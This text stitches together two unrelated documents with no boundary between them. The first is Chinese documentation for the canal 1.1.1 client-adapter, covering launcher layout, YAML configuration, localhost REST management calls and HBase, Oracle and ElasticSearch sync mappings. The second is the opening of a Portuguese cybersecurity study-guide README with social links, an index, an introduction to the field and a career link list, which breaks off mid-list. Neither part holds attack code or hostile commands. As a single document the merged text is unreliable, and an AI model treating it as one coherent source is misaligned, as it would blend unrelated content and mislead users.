## 基本说明 canal 1.1.1版本之后, 增加客户端数据落地的适配及启动功能, 目前支持功能: * 客户端启动器 * 同步管理REST接口 * 日志适配器, 作为DEMO * HBase的数据同步(表对表同步), ETL功能 * (后续支持) ElasticSearch多表数据同步,ETL功能 ## 环境版本 * 操作系统:无要求 * java版本: jdk1.8 以上 * canal 版本: 请下载最新的安装包,本文以当前v1.1.1 的canal.deployer-1.1.1.tar.gz为例 * MySQL版本 :5.7.18 * HBase版本: Apache HBase 1.1.2, 若和服务端版本不一致可自行替换客户端HBase依赖 ## 一、适配器启动器 client-adapter分为适配器和启动器两部分, 适配器为多个fat jar, 每个适配器会将自己所需的依赖打成一个包, 以SPI的方式让启动器动态加载 启动器为 SpringBoot 项目, 支持canal-client启动的同时提供相关REST管理接口, 运行目录结构为: ``` - bin restart.sh startup.bat startup.sh stop.sh - lib client-adapter.logger-1.1.1-jar-with-dependencies.jar client-adapter.hbase-1.1.1-jar-with-dependencies.jar ... - conf application.yml - hbase mytest_person2.yml - logs ``` 以上目录结构最终会打包成 canal-adapter-launcher.tar.gz 压缩包 ## 二、启动器 ### 2.1 启动器配置 application.yml #### canal相关配置部分说明 ``` canal.conf: canalServerHost: 127.0.0.1:11111 # 对应单机模式下的canal server的ip:port zookeeperHosts: slave1:2181 # 对应集群模式下的zk地址, 如果配置了canalServerHost, 则以canalServerHost为准 bootstrapServers: slave1:6667 # kafka或rocketMQ地址, 与canalServerHost不能并存 flatMessage: true # 扁平message开关, 是否以json字符串形式投递数据, 仅在kafka/rocketMQ模式下有效 canalInstances: # canal实例组, 如果是tcp模式可配置此项 - instance: example # 对应canal destination groups: # 对应适配器分组, 分组间的适配器并行运行 - outAdapters: # 适配器列表, 分组内的适配串行运行 - name: logger # 适配器SPI名 - name: hbase properties: # HBase相关连接参数 hbase.zookeeper.quorum: slave1 hbase.zookeeper.property.clientPort: 2181 zookeeper.znode.parent: /hbase mqTopics: # MQ topic租, 如果是kafka或者rockeMQ模式可配置此项, 与canalInstances不能并存 - mqMode: kafka # MQ的模式: kafak/rocketMQ topic: example # MQ topic groups: # group组 - groupId: g2 # group id outAdapters: # 适配器列表, 以下配置和canalInstances中一样 - name: logger ``` #### 适配器相关配置部分说明 ``` adapter.conf: datasourceConfigs: # 数据源配置列表, 数据源将在适配器中用于ETL、数据同步回查等使用 defaultDS: # 数据源 dataSourceKey, 适配器中通过该值获取指定数据源 url: jdbc:mysql://127.0.0.1:3306/mytest?useUnicode=true username: root password: 121212 adapterConfigs: # 适配器内部配置列表 - hbase/mytest_person2.yml # 类型/配置文件名, 这里示例就是对应HBase适配器hbase目录下的mytest_person2.yml文件 ``` ## 2.2 同步管理REST接口 #### 2.2.1 查询所有订阅同步的canal destination或MQ topic ``` curl http://127.0.0.1:8081/destinations ``` #### 2.2.2 数据同步开关 ``` curl http://127.0.0.1:8081/syncSwitch/example/off -X PUT ``` 针对 example 这个canal destination/MQ topic 进行开关操作. off代表关闭, 该destination/topic下的同步将阻塞或者断开连接不再接收数据, on代表开启 注: 如果在配置文件中配置了 zookeeperHosts 项, 则会使用分布式锁来控制HA中的数据同步开关, 如果是单机模式则使用本地锁来控制开关 #### 2.2.3 数据同步开关状态 ``` curl http://127.0.0.1:8081/syncSwitch/example ``` 查看指定 canal destination/MQ topic 的数据同步开关状态 #### 2.2.4 手动ETL ``` curl http://127.0.0.1:8081/etl/hbase/mytest_person2.yml -X POST -d "params=2018-10-21 00:00:00" ``` 导入数据到指定类型的库 #### 2.2.5 查看相关库总数据 ``` curl http://127.0.0.1:8081/count/hbase/mytest_person2.yml ``` ### 2.3 启动canal-adapter示例 #### 2.3.1 启动canal server (单机模式), 参考: [Canal QuickStart](https://github.com/alibaba/canal/wiki/QuickStart) #### 2.3.2 修改conf/application.yml为: ``` server: port: 8081 logging: level: com.alibaba.otter.canal.client.adapter.hbase: DEBUG spring: jackson: date-format: yyyy-MM-dd HH:mm:ss time-zone: GMT+8 default-property-inclusion: non_null canal.conf: canalServerHost: 127.0.0.1:11111 flatMessage: true canalInstances: - instance: example adapterGroups: - outAdapters: - name: logger ``` 启动 ``` bin/startup.sh ``` ## 三、HBase适配器 ### 3.1 修改启动器配置: application.yml ``` server: port: 8081 logging: level: com.alibaba.otter.canal.client.adapter.hbase: DEBUG spring: jackson: date-format: yyyy-MM-dd HH:mm:ss time-zone: GMT+8 default-property-inclusion: non_null canal.conf: canalServerHost: 127.0.0.1:11111 flatMessage: true srcDataSources: defaultDS: url: jdbc:mysql://127.0.0.1:3306/mytest?useUnicode=true username: root password: 121212 canalInstances: - instance: example adapterGroups: - outAdapters: - name: hbase properties: hbase.zookeeper.quorum: slave1 hbase.zookeeper.property.clientPort: 2181 zookeeper.znode.parent: /hbase ``` adapter将会自动加载 conf/hbase 下的所有.yml结尾的配置文件 ### 3.2 适配器表映射文件 修改 conf/hbase/mytest_person.yml文件: ``` dataSourceKey: defaultDS # 对应application.yml中的datasourceConfigs下的配置 hbaseMapping: # mysql--HBase的单表映射配置 mode: STRING # HBase中的存储类型, 默认统一存为String, 可选: #PHOENIX #NATIVE #STRING # NATIVE: 以java类型为主, PHOENIX: 将类型转换为Phoenix对应的类型 destination: example # 对应 canal destination/MQ topic 名称 database: mytest # 数据库名/schema名 table: person # 表名 hbaseTable: MYTEST.PERSON # HBase表名 family: CF # 默认统一Column Family名称 uppercaseQualifier: true # 字段名转大写, 默认为true commitBatch: 3000 # 批量提交的大小, ETL中用到 #rowKey: id,type # 复合字段rowKey不能和columns中的rowKey并存 # 复合rowKey会以 '|' 分隔 columns: # 字段映射, 如果不配置将自动映射所有字段, # 并取第一个字段为rowKey, HBase字段名以mysql字段名为主 id: ROWKE name: CF:NAME email: EMAIL # 如果column family为默认CF, 则可以省略 type: # 如果HBase字段和mysql字段名一致, 则可以省略 c_time: birthday: ``` 如果涉及到类型转换,可以如下形式: ``` ... columns: id: ROWKE$STRING ... type: TYPE$BYTE ... ``` 类型转换涉及到Java类型和Phoenix类型两种, 分别定义如下: ``` #Java 类型转换, 对应配置 mode: NATIVE $DEFAULT $STRING $INTEGER $LONG $SHORT $BOOLEAN $FLOAT $DOUBLE $BIGDECIMAL $DATE $BYTE $BYTES ``` ``` #Phoenix 类型转换, 对应配置 mode: PHOENIX $DEFAULT 对应PHOENIX里的VARCHAR $UNSIGNED_INT 对应PHOENIX里的UNSIGNED_INT 4字节 $UNSIGNED_LONG 对应PHOENIX里的UNSIGNED_LONG 8字节 $UNSIGNED_TINYINT 对应PHOENIX里的UNSIGNED_TINYINT 1字节 $UNSIGNED_SMALLINT 对应PHOENIX里的UNSIGNED_SMALLINT 2字节 $UNSIGNED_FLOAT 对应PHOENIX里的UNSIGNED_FLOAT 4字节 $UNSIGNED_DOUBLE 对应PHOENIX里的UNSIGNED_DOUBLE 8字节 $INTEGER 对应PHOENIX里的INTEGER 4字节 $BIGINT 对应PHOENIX里的BIGINT 8字节 $TINYINT 对应PHOENIX里的TINYINT 1字节 $SMALLINT 对应PHOENIX里的SMALLINT 2字节 $FLOAT 对应PHOENIX里的FLOAT 4字节 $DOUBLE 对应PHOENIX里的DOUBLE 8字节 $BOOLEAN 对应PHOENIX里的BOOLEAN 1字节 $TIME 对应PHOENIX里的TIME 8字节 $DATE 对应PHOENIX里的DATE 8字节 $TIMESTAMP 对应PHOENIX里的TIMESTAMP 12字节 $UNSIGNED_TIME 对应PHOENIX里的UNSIGNED_TIME 8字节 $UNSIGNED_DATE 对应PHOENIX里的UNSIGNED_DATE 8字节 $UNSIGNED_TIMESTAMP 对应PHOENIX里的UNSIGNED_TIMESTAMP 12字节 $VARCHAR 对应PHOENIX里的VARCHAR 动态长度 $VARBINARY 对应PHOENIX里的VARBINARY 动态长度 $DECIMAL 对应PHOENIX里的DECIMAL 动态长度 ``` 如果不配置将以java对象原生类型默认映射转换 ### 3.3 启动HBase数据同步 #### 创建HBase表 在HBase shell中运行: ``` create 'MYTEST.PERSON', {NAME=>'CF'} ``` #### 启动canal-adapter启动器 ``` bin/startup.sh ``` #### 验证 修改mysql mytest.person表的数据, 将会自动同步到HBase的MYTEST.PERSON表下面, 并会打出DML的log ## 四、关系型数据库适配器 RDB adapter 用于适配mysql到任意关系型数据库(需支持jdbc)的数据同步及导入 ### 4.1 修改启动器配置: application.yml, 这里以oracle目标库为例 ``` server: port: 8081 logging: level: com.alibaba.otter.canal.client.adapter.rdb: DEBUG ...... canal.conf: canalServerHost: 127.0.0.1:11111 srcDataSources: defaultDS: url: jdbc:mysql://127.0.0.1:3306/mytest?useUnicode=true username: root password: 121212 canalInstances: - instance: example groups: - outAdapters: - name: rdb # 指定为rdb类型同步 key: oracle1 # 指定adapter的唯一key, 与表映射配置中outerAdapterKey对应 properties: jdbc.driverClassName: oracle.jdbc.OracleDriver # jdbc驱动名, jdbc的jar包需要自行放致lib目录下 jdbc.url: jdbc:oracle:thin:@localhost:49161:XE # jdbc url jdbc.username: mytest # jdbc username jdbc.password: m121212 # jdbc password threads: 5 # 并行执行的线程数, 默认为1 commitSize: 3000 # 批次提交的最大行数 ``` 其中 outAdapter 的配置: name统一为rdb, key为对应的数据源的唯一标识需和下面的表映射文件中的outerAdapterKey对应, properties为目标库jdb的相关参数 adapter将会自动加载 conf/rdb 下的所有.yml结尾的表映射配置文件 ### 4.2 适配器表映射文件 修改 conf/rdb/mytest_user.yml文件: ``` dataSourceKey: defaultDS # 源数据源的key, 对应上面配置的srcDataSources中的值 destination: example # cannal的instance或者MQ的topic outerAdapterKey: oracle1 # adapter key, 对应上面配置outAdapters中的key concurrent: true # 是否按主键hase并行同步, 并行同步的表必须保证主键不会更改及主键不能为其他同步表的外键!! dbMapping: database: mytest # 源数据源的database/shcema table: user # 源数据源表名 targetTable: mytest.tb_user # 目标数据源的库名.表名 targetPk: # 主键映射 id: id # 如果是复合主键可以换行映射多个 # mapAll: true # 是否整表映射, 要求源表和目标表字段名一模一样 (如果targetColumns也配置了映射,则以targetColumns配置为准) targetColumns: # 字段映射, 格式: 目标表字段: 源表字段, 如果字段名一样源表字段名可不填 id: name: role_id: c_time: test1: ``` 导入的类型以目标表的元类型为准, 将自动转换 ### 4.3 启动RDB数据同步 #### 将目标库的jdbc jar包放入lib文件夹, 这里放入ojdbc6.jar #### 启动canal-adapter启动器 ``` bin/startup.sh ``` #### 验证 修改mysql mytest.user表的数据, 将会自动同步到Oracle的MYTEST.TB_USER表下面, 并会打出DML的log ## 五、ElasticSearch适配器 ### 5.1 修改启动器配置: application.yml ``` server: port: 8081 logging: level: com.alibaba.otter.canal.client.adapter.es: DEBUG spring: jackson: date-format: yyyy-MM-dd HH:mm:ss time-zone: GMT+8 default-property-inclusion: non_null canal.conf: canalServerHost: 127.0.0.1:11111 flatMessage: true srcDataSources: defaultDS: url: jdbc:mysql://127.0.0.1:3306/mytest?useUnicode=true username: root password: 121212 canalInstances: - instance: example adapterGroups: - outAdapters: - name: es hosts: 127.0.0.1:9300 # es 集群地址, 逗号分隔 properties: cluster.name: elasticsearch # es cluster name ``` adapter将会自动加载 conf/es 下的所有.yml结尾的配置文件 ### 5.2 适配器表映射文件 修改 conf/es/mytest_user.yml文件: ``` dataSourceKey: defaultDS # 源数据源的key, 对应上面配置的srcDataSources中的值 destination: example # cannal的instance或者MQ的topic esMapping: _index: mytest_user # es 的索引名称 _type: _doc # es 的doc名称 _id: _id # es 的_id, 如果不配置该项必须配置下面的pk项_id则会由es自动分配 # pk: id # 如果不需要_id, 则需要指定一个属性为主键属性 # sql映射 sql: "select a.id as _id, a.name as _name, a.role_id as _role_id, b.role_name as _role_name, a.c_time as _c_time, c.labels as _labels from user a left join role b on b.id=a.role_id left join (select user_id, group_concat(label order by id desc separator ';') as labels from label group by user_id) c on c.user_id=a.id" # objFields: # _labels: array:; # 数组或者对象属性, array:; 代表以;字段里面是以;分隔的 # _obj: obj:{"test":"123"} etlCondition: "where a.c_time>='{0}'" # etl 的条件参数 commitBatch: 3000 # 提交批大小 ``` sql映射说明: sql支持多表关联自由组合, 但是有一定的限制: 1. 主表不能为子查询语句 2. 只能使用left outer join即最左表一定要是主表 3. 关联从表如果是子查询不能有多张表 4. 主sql中不能有where查询条件(从表子查询中可以有where条件但是不推荐, 可能会造成数据同步的不一致, 比如修改了where条件中的字段内容) 5. 关联条件只允许主外键的'='操作不能出现其他常量判断比如: on a.role_id=b.id and b.statues=1 6. 关联条件必须要有一个字段出现在主查询语句中比如: on a.role_id=b.id 其中的 a.role_id 或者 b.id 必须出现在主select语句中 Elastic Search的mapping 属性与sql的查询值将一一对应(不支持 select *), 比如: select a.id as _id, a.name, a.email as _email from user, 其中name将映射到es mapping的name field, _email将 映射到mapping的_email field, 这里以别名(如果有别名)作为最终的映射字段. 这里的_id可以填写到配置文件的 _id: _id映射. #### 5.2.1.单表映射索引示例sql: ``` select a.id as _id, a.name, a.role_id, a.c_time from user a ``` 该sql对应的es mapping示例: ``` { "mytest_user": { "mappings": { "_doc": { "properties": { "name": { "type": "text" }, "role_id": { "type": "long" }, "c_time": { "type": "date" } } } } } } ``` #### 5.2.2.单表映射索引示例sql带函数或运算操作: ``` select a.id as _id, concat(a.name,'_test') as name, a.role_id+10000 as role_id, a.c_time from user a ``` 函数字段后必须跟上别名, 该sql对应的es mapping示例: ``` { "mytest_user": { "mappings": { "_doc": { "properties": { "name": { "type": "text" }, "role_id": { "type": "long" }, "c_time": { "type": "date" } } } } } } ``` #### 5.2.3.多表映射(一对一, 多对一)索引示例sql: ``` select a.id as _id, a.name, a.role_id, b.role_name, a.c_time from user a left join role b on b.id = a.role_id ``` 注:这里join操作只能是left outer join, 第一张表必须为主表!! 该sql对应的es mapping示例: ``` { "mytest_user": { "mappings": { "_doc": { "properties": { "name": { "type": "text" }, "role_id": { "type": "long" }, "role_name": { "type": "text" }, "c_time": { "type": "date" } } } } } } ``` #### 5.2.4.多表映射(一对多)索引示例sql: ``` select a.id as _id, a.name, a.role_id, c.labels, a.c_time from user a left join (select user_id, group_concat(label order by id desc separator ';') as labels from label group by user_id) c on c.user_id=a.id ``` 注:left join 后的子查询只允许一张表, 即子查询中不能再包含子查询或者关联!! 该sql对应的es mapping示例: ``` { "mytest_user": { "mappings": { "_doc": { "properties": { "name": { "type": "text" }, "role_id": { "type": "long" }, "c_time": { "type": "date" }, "labels": { "type": "text" } } } } } } ``` #### 5.2.5.其它类型的sql示例: - geo type ``` select ... concat(IFNULL(a.latitude, 0), ',', IFNULL(a.longitude, 0)) AS location, ... ``` - 复合主键 ``` select concat(a.id,'_',b.type) as _id, ... from user a left join role b on b.id=a.role_id ``` - 数组字段 ``` select a.id as _id, a.name, a.role_id, c.labels, a.c_time from user a left join (select user_id, group_concat(label order by id desc separator ';') as labels from label group by user_id) c on c.user_id=a.id ``` 配置中使用: ``` objFields: labels: array:; ``` ### 5.3 启动ES数据同步 #### 启动canal-adapter启动器 ``` bin/startup.sh ``` #### 验证 1. 新增mysql mytest.user表的数据, 将会自动同步到es的mytest_user索引下面, 并会打出DML的log 2. 修改mysql mytest.role表的role_name, 将会自动同步es的mytest_user索引中的role_name数据 3. 新增或者修改mysql mytest.label表的label, 将会自动同步es的mytest_user索引中的labels数据
<p align="center"> <a href="https://github.com/arthurspk/guiadecybersecurity"> <img src="./images/guia.png" alt="Guia de Cyber Security" width="160" height="160"> </a> <h1 align="center">Guia de Cyber Security</h1> </p> ## :dart: O guia para alavancar a sua carreira Abaixo você encontrará conteúdos para te guiar e ajudar a se tornar um profissional na área de segurança da informação ou se especializar caso você já atue na área, confira o repositório para descobrir novas ferramentas para o seu dia-a-dia, tecnologias para incorporar na sua stack com foco em se tornar um profissional atualizado e diferenciado em segurança da informação, alguns sites ou artigos podem estar em um idioma diferente do seu, porém isso não impede que você consiga realizar a leitura do artigo ou site em questão, você pode utilizar a ferramenta de tradução do Google para traduzir: sites, arquivos, textos. <sub> <strong>Siga nas redes sociais para acompanhar mais conteúdos: </strong> <br> [<img src = "https://img.shields.io/badge/GitHub-100000?style=for-the-badge&logo=github&logoColor=white">](https://github.com/arthurspk) [<img src = "https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white">](https://www.facebook.com/seixasqlc/) [<img src="https://img.shields.io/badge/linkedin-%230077B5.svg?&style=for-the-badge&logo=linkedin&logoColor=white" />](https://www.linkedin.com/in/arthurspk/) [<img src = "https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white">](https://twitter.com/manotoquinho) [![Discord Badge](https://img.shields.io/badge/Discord-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/NbMQUPjHz7) [<img src = "https://img.shields.io/badge/instagram-%23E4405F.svg?&style=for-the-badge&logo=instagram&logoColor=white">](https://www.instagram.com/guiadevbrasil/) [![Youtube Badge](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/channel/UCzmXzz_VR0Li8-YOvWN_t3g) </sub> ## 💌 Doações > Olá! Se você está lendo isso, é porque provavelmente já conhece o meu repositório no GitHub, que oferece conteúdo gratuito para ajudar desenvolvedores a aprimorarem suas habilidades. E se você está aqui, talvez esteja considerando contribuir com uma doação para apoiar a continuação do projeto. - [Clique aqui para realizar realizar uma doação! 💓](https://beacons.ai/doacoesguiadev) > Se você quiser contribuir, existem várias opções disponíveis, incluindo PayPal, PagSeguro, Mercado Pago, Buy Me A Coffe, Pic Pay e Pix. Qualquer doação, por menor que seja, é extremamente bem-vinda e será usada com responsabilidade e transparência. Obrigado por considerar apoiar meu projeto! Juntos, podemos continuar a compartilhar conhecimento e ajudar a criar uma comunidade de desenvolvedores mais forte e colaborativa. ## :closed_book: E-Book > Este repositório é um projeto gratuito para a comunidade de desenvolvedores. Você pode me ajudar comprando o e-book "e-Front" se estiver interessado em aprender ou melhorar suas habilidades de desenvolvimento front-end. O e-book é completo e cobre tecnologias essenciais como HTML, CSS, JavaScript, React, TypeScript e mais. O valor é simbólico e sua compra me ajuda a produzir e fornecer mais conteúdo gratuito para a comunidade. Adquira agora e comece sua jornada no desenvolvimento front-end. - eFront - Estudando Desenvolvimento Front-end do Zero. [Clique aqui para comprar](https://hotm.art/cSMObU) ## ⚠️ Aviso importante > Antes de tudo você pode me ajudar e colaborar, deu bastante trabalho fazer esse repositório e organizar para fazer seu estudo ou trabalho melhor, portanto você pode me ajudar das seguinte maneiras - Me siga no [Github](https://github.com/arthurspk) - Acesse as redes sociais do [Guia Dev Brasil](https://linktr.ee/guiadevbrasil) - Mande feedbacks no [Linkedin](https://www.linkedin.com/in/arthurspk/) ## 💡 Nossa proposta > A proposta deste guia é fornecer conteúdos para seu estudo, para guiá-lo se você estiver confuso sobre qual o próximo aprendizado, não influenciar você a seguir os 'hypes' e 'trendys' do momento. Acreditamos que com um <b>maior conhecimento das diferentes estruturas e soluções disponíveis poderá escolher a ferramenta que melhor se aplica às suas demandas.</b> E lembre-se, 'hypes' e 'trendys' nem sempre são as melhores opções. ## :beginner: Para quem está começando agora > Não se assuste com a quantidade de conteúdo apresentados neste guia. Acredito que quem está começando pode usá-lo não como um objetivo, mas como um apoio para os estudos. <b>Neste momento, dê enfoque no que te dá produtividade e o restante marque como <i>Ver depois</i></b>. Ao passo que seu conhecimento se torna mais amplo, a tendência é este guia fazer mais sentido e fácil de ser assimilado. Bons estudos e entre em contato sempre que quiser! :punch: ## 🚨 Colabore - Abra Pull Requests com atualizações - Discuta ideias em Issues - Compartilhe o repositório com a sua comunidade ## 🌍 Tradução > Se você deseja acompanhar esse repositório em outro idioma que não seja o Português , você pode optar pelas escolhas de idiomas abaixo, você também pode colaborar com a tradução para outros idiomas e a correções de possíveis erros ortográficos, a comunidade agradece. <img src = "https://i.imgur.com/lpP9V2p.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>English — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/GprSvJe.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Spanish — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/4DX1q8l.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Chinese — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/6MnAOMg.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Hindi — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/8t4zBFd.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Arabic — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/iOdzTmD.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>French — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/PILSgAO.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Italian — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/0lZOSiy.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Korean — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/3S5pFlQ.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Russian — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/i6DQjZa.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>German — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> <img src = "https://i.imgur.com/wWRZMNK.png" alt="Guia Extenso de Programação" width="16" height="15">・<b>Japanese — </b> [Click Here](https://github.com/arthurspk/guiadevbrasil)<br> ## 📚 ÍNDICE [🗺️ Cyber Security roadmap](#%EF%B8%8F-cyber-security-roadmap) <br> [🔧 Ferramentas para tradução de conteúdo](#-ferramentas-para-tradução-de-conteúdo) <br> [🧥 Introdução a área de Cyber Security](#-introdução-a-área-de-cyber-security) <br> [💼 Carreiras na área de Cyber Security](#-carreiras-na-área-de-cyber-security) <br> [🕵️‍♂️ Sites para estudar Cyber Security](#%EF%B8%8F%EF%B8%8F-sites-para-estudar-cyber-security) <br> [📰 Sites de noticias](#-sites-de-noticias-de-cyber-security) <br> [📃 Newsletters](#-newsletters-de-cyber-security) <br> [🗃️ Awesome Hacking](#%EF%B8%8F-awesome-hacking) <br> [🔗 Testes de segurança de API](#-testes-de-segurança-de-api) <br> [🎥 Canais do Youtube](#-canais-do-youtube) <br> [🔎 Ferramentas de busca](#-ferramentas-de-busca) <br> [📱 Ferramentas de Mobile](#-ferramentas-de-mobile) <br> [🎤 Podcasts](#-podcasts-de-cyber-security) <br> [📽️ Palestras](#%EF%B8%8F-palestras) <br> [🃏 CheatSheets](#-cheatsheets) <br> [♟️ Exploitation](#%EF%B8%8F-exploitation) <br> [🎬 Documentários](#-documentários) <br> [🚩 Capture the Flag](#-capture-the-flag) <br> [🐧 Distros de Linux](#-distros-de-linux) <br> [💻 Máquinas Virtuais](#-máquinas-virtuais) <br> [💰 Sites de Bug Bounty](#-sites-de-bug-bounty) <br> [📮 Perfis no Twitter](#-perfis-no-twitter) <br> [✨ Perfis no Instagram](#-perfis-no-instagram) <br> [🎇 Comunidades no Reddit](#-comunidades-no-reddit) <br> [🌌 Comunidades no Discord](#-comunidades-no-discord) <br> [📚 Recomendações de livros](#-recomendações-de-livros) <br> [🛠️ Frameworks e ferramentas de Hacking Web](#%EF%B8%8F-frameworks-e-ferramentas-de-hacking-web) <br> [🪓 Ferramentas para obter informações](#-ferramentas-para-obter-informações) <br> [🔧 Ferramentas para Pentesting](#-ferramentas-para-pentesting) <br> [🔨 Ferramentas para Hardware Hacking](#-ferramentas-para-hardware-hacking) <br> [🦉 Sites e cursos para aprender C](#-sites-e-cursos-para-aprender-c) <br> [🐬 Sites e cursos para aprender Go](#-sites-e-cursos-para-aprender-go) <br> [🦚 Sites e cursos para aprender C#](#-sites-e-cursos-para-aprender-c-1) <br> [🐸 Sites e cursos para aprender C++](#-sites-e-cursos-para-aprender-c-2) <br> [🐘 Sites e cursos para aprender PHP](#-sites-e-cursos-para-aprender-php) <br> [🦓 Sites e cursos para aprender Java](#-sites-e-cursos-para-aprender-java) <br> [🐦 Sites e cursos para aprender Ruby](#-sites-e-cursos-para-aprender-ruby) <br> [🐪 Sites e cursos para aprender Perl](#-sites-e-cursos-para-aprender-perl) <br> [🐷 Sites e cursos para aprender Bash](#-sites-e-cursos-para-aprender-bash) <br> [🐴 Sites e cursos para aprender MySQL](#-sites-e-cursos-para-aprender-mysql) <br> [🐧 Sites e cursos para aprender Linux](#-sites-e-cursos-para-aprender-linux) <br> [🦂 Sites e cursos para aprender Swift](#-sites-e-cursos-para-aprender-swift) <br> [🐍 Sites e cursos para aprender Python](#-sites-e-cursos-para-aprender-python) <br> [🐋 Sites e cursos para aprender Docker](#-sites-e-cursos-para-aprender-docker) <br> [🐼 Sites e cursos para aprender Assembly](#-sites-e-cursos-para-aprender-assembly) <br> [🦞 Sites e cursos para aprender Powershell](#-sites-e-cursos-para-aprender-powershell) <br> [🖥️ Sites e cursos para aprender Hardware Hacking](#%EF%B8%8F-sites-e-cursos-para-aprender-hardware-hacking) <br> [📡 Sites e cursos para aprender Redes de Computadores](#-sites-e-cursos-para-aprender-redes-de-computadores) <br> [🎓 Certificações para Cyber Security](#-certificações-para-cyber-security) <br> ## 🗺️ Cyber Security roadmap ![Cyber Security roadmap](https://i.imgur.com/eq4uu7P.jpg) ## 🔧 Ferramentas para tradução de conteúdo > Muito do conteúdo desse repositório pode se encontrar em um idioma diferente do Português , desta maneira, fornecemos algumas ferramentas para que você consiga realizar a tradução do conteúdo, lembrando que o intuito desse guia é fornecer todo o conteúdo possível para que você possa se capacitar na área de Cyber Security independente do idioma a qual o material é fornecido, visto que se você possuí interesse em consumir esse material isso não será um empecilho para você continue seus estudos. - [Google Translate](https://translate.google.com.br/?hl=pt-BR) - [Linguee](https://www.linguee.com.br/ingles-portugues/traducao/translate.html) - [DeepL](https://www.deepl.com/pt-BR/translator) - [Reverso](https://context.reverso.net/traducao/ingles-portugues/translate) ## 🧥 Introdução a área de Cyber Security > Também chamada de segurança de computadores ou segurança da tecnologia da informação, a cybersecurity é a prática de proteção de hardwares e softwares contra roubo ou danos, como servidores, dispositivos móveis, redes e aplicativos, as pessoas que atuam na área de Cyber Security de uma empresa são responsáveis por identificar todos os pontos vulneráveis do negócio no ambiente digital e em variados sistemas, o trabalho consiste em mapear todos os pontos fracos, que podem ser usados como porta de acesso para ataques virtuais. Além disso, é importante simular todos os possíveis ataques que poderiam ser realizados e criar proteções contra eles, antevendo os fatos para poder reforçar a segurança das informações e a redundância dos processos e sistemas de bancos de dados, a fim de evitar que haja interrupção de serviços, de uma forma geral, é esperado que as pessoas que trabalham com Cyber Security realizem uma série de atividades, tais como: - Prever os riscos de sistemas, lojas virtuais e ambientes virtuais de empresas e diminuir possibilidades de ataques; - Detectar todas as intrusões e elaborar sistemas de proteção; - Criar políticas e planos de acesso a dados e informações; - Implementar e atualizar parâmetros de segurança; - Treinar e supervisionar o trabalho do time de Cyber Security; - Organizar um sistema eficiente e seguro para colaboradores/as e terceirizados/as; - Verificar todas as vulnerabilidades e as falhas responsáveis por elas; - Fazer auditorias periódicas nos sistemas; - Realizar avaliações de risco em redes, apps e sistemas; - Fazer testes de suscetibilidade; - Garantir plena segurança ao armazenamento de dados de empresas, lojas virtuais e outros. ## 💼 Carreiras na área de Cyber Security > Nesse tópico você irá conhecer mais sobre as carreiras que você pode seguir dentro da área de Cyber Security, você encontrará as profissões em conjunto com um artigo ou video explicativo sobre como funciona. - [Forensics](https://imasters.com.br/carreira-dev/profissao-analista-forense-computacional) - [Biometrics](https://www.thoughtworks.com/pt-br/insights/decoder/b/biometrics) - [IA Security](https://successfulstudent.org/jobs-in-information-assurance-and-security/) - [IoT Security](https://www.quora.com/How-do-I-start-my-career-in-IoT-Security) - [Cryptography](https://www.wgu.edu/career-guide/information-technology/cryptographer-career.html#:~:text=What%20Does%20a%20Cryptographer%20Do,%2C%20business%2C%20or%20military%20data.) - [Cloud Security](https://www.cybersecurityjobsite.com/staticpages/10291/careers-in-cloud-security/#:~:text=Cloud%20security%20careers%20are%20set,these%20critical%20systems%20are%20safe.) - [Fraud Prevention](https://www.zippia.com/fraud-prevention-specialist-jobs/) - [Malware Analysis](https://onlinedegrees.sandiego.edu/malware-analyst-career-guide/#:~:text=A%20malware%20analyst%20works%20in,%2C%E2%80%9D%20explains%20the%20Infosec%20Institute.) - [Hardware Hacking](https://www.helpnetsecurity.com/2019/07/15/hardware-hacker/) - [Big Data Security](https://www.simplilearn.com/cyber-security-vs-data-science-best-career-option-article) - [Physical Security](https://www.zippia.com/physical-security-specialist-jobs/what-does-a-physical-security-specialist-do/) - [Security Awareness](https://resources.infosecinstitute.com/topic/security-awareness-manager-is-it-the-career-for-you/) - [Threat Intelligence](https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/why-pursue-career-cyber-threat-intelligence/#:~:text=Put%20simply%2C%20threat%20intelligence%20professionals,combat%20existing%20and%20emerging%20threats.) - [Business Continuity](https://www.zippia.com/business-continuity-planner-jobs/) - [Operations Security](https://www.zippia.com/operational-security-specialist-jobs/) - [Application Security](https://www.appsecengineer.com/blog/guide-to-becoming-an-application-security-engineer) - [Legal and Regulations](https://onlinemasteroflegalstudies.com/career-guides/) - [Communications Security](https://www.ukcybersecuritycouncil.org.uk/qualifications-and-careers/careers-route-map/cryptography-communications-security/) - [Cyber Security Engineer](https://onlinedegrees.sandiego.edu/should-you-become-a-cyber-security-engineer/#:~:text=Cybersecurity%20engineers%2C%20sometimes%20called%20information,and%20all%20types%20of%20cybercrime.) - 